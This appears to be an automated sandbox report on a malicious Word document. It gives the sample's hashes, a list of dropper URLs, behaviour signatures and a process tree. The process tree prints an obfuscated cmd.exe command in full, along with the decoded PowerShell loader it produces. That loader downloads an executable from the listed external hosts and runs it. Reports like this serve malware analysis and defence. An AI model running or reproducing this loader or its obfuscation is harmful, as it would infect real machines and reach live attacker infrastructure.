Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-05-2024 14:13

General

  • Target

    87484786363a6575fa1ea535b0d2b64f_JaffaCakes118.doc

  • Size

    224KB

  • MD5

    87484786363a6575fa1ea535b0d2b64f

  • SHA1

    c5e011b0547faa8bcec31ddb06a14e37e5a5aa32

  • SHA256

    6dade8c0ed4e95b82f0b104512f23ccc20849853dd2c17c46f4a468b32eae0f9

  • SHA512

    6cb2d8d8b759e10290286c749afa468d07981c22f5fa26907c7b196d843c77bff587b89bffca7f5469a790716a5abaa2a0b0e1892d8b3fff4a91cee5cb513f5c

  • SSDEEP

    3072:ZtUxagq58ghpPyjL/xSu90OoiLuDKZXfwKeljR1C:ZtUxagqOgvPAxUOmD+XfwLu

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k

exe.dropper

http://www.vario-reducer.com/wp-content/bGkoUUavZySGn

exe.dropper

http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N

exe.dropper

http://mingroups.vn/NYV82LSYWEs_s1

exe.dropper

http://www.ontamada.ru/RDUstD0DxgOP

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\87484786363a6575fa1ea535b0d2b64f_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| %TMP:~-8,-7%%CommonProgramFiles:~19,1%%LOCALAPPDATA:~-10,-9% "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4632
      • C:\Windows\system32\cmd.exe
        CmD /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| cmD "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2012
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $wdrbkki='quqzl';$kdjvjlh=new-object Net.WebClient;$mklff='http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k@http://www.vario-reducer.com/wp-content/bGkoUUavZySGn@http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N@http://mingroups.vn/NYV82LSYWEs_s1@http://www.ontamada.ru/RDUstD0DxgOP'.Split('@');$zwort='llvmi';$wzduil = '70';$qjtsvlc='jtjlzjp';$rskct=$env:temp+'\'+$wzduil+'.exe';foreach($conqzdd in $mklff){try{$kdjvjlh.DownloadFile($conqzdd, $rskct);$vuizpab='ppzaw';If ((Get-Item $rskct).length -ge 40000) {Invoke-Item $rskct;$djjscvz='izoplc';break;}}catch{}}$jfjktqs='fmmzjwj';"
          4⤵
            PID:3736
          • C:\Windows\system32\cmd.exe
            cmD
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1664
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $wdrbkki='quqzl';$kdjvjlh=new-object Net.WebClient;$mklff='http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k@http://www.vario-reducer.com/wp-content/bGkoUUavZySGn@http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N@http://mingroups.vn/NYV82LSYWEs_s1@http://www.ontamada.ru/RDUstD0DxgOP'.Split('@');$zwort='llvmi';$wzduil = '70';$qjtsvlc='jtjlzjp';$rskct=$env:temp+'\'+$wzduil+'.exe';foreach($conqzdd in $mklff){try{$kdjvjlh.DownloadFile($conqzdd, $rskct);$vuizpab='ppzaw';If ((Get-Item $rskct).length -ge 40000) {Invoke-Item $rskct;$djjscvz='izoplc';break;}}catch{}}$jfjktqs='fmmzjwj';
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4084

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\TCDA5BD.tmp\iso690.xsl

      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogqbuhrs.3oo.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2708-33-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-540-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-4-0x00007FFCDD32D000-0x00007FFCDD32E000-memory.dmp

      Filesize

      4KB

    • memory/2708-5-0x00007FFC9D310000-0x00007FFC9D320000-memory.dmp

      Filesize

      64KB

    • memory/2708-7-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-6-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-8-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-9-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-12-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-11-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-10-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-15-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-16-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-39-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-14-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-13-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-18-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-19-0x00007FFC9B2B0000-0x00007FFC9B2C0000-memory.dmp

      Filesize

      64KB

    • memory/2708-572-0x00007FFC9D310000-0x00007FFC9D320000-memory.dmp

      Filesize

      64KB

    • memory/2708-3-0x00007FFC9D310000-0x00007FFC9D320000-memory.dmp

      Filesize

      64KB

    • memory/2708-17-0x00007FFC9B2B0000-0x00007FFC9B2C0000-memory.dmp

      Filesize

      64KB

    • memory/2708-40-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-576-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-2-0x00007FFC9D310000-0x00007FFC9D320000-memory.dmp

      Filesize

      64KB

    • memory/2708-1-0x00007FFC9D310000-0x00007FFC9D320000-memory.dmp

      Filesize

      64KB

    • memory/2708-343-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-347-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-346-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-345-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-344-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-366-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-493-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-530-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-34-0x00007FFCDD290000-0x00007FFCDD485000-memory.dmp

      Filesize

      2.0MB

    • memory/2708-573-0x00007FFC9D310000-0x00007FFC9D320000-memory.dmp

      Filesize

      64KB

    • memory/2708-574-0x00007FFC9D310000-0x00007FFC9D320000-memory.dmp

      Filesize

      64KB

    • memory/2708-575-0x00007FFC9D310000-0x00007FFC9D320000-memory.dmp

      Filesize

      64KB

    • memory/2708-0-0x00007FFC9D310000-0x00007FFC9D320000-memory.dmp

      Filesize

      64KB

    • memory/4084-44-0x000002B19D2D0000-0x000002B19D2F2000-memory.dmp

      Filesize

      136KB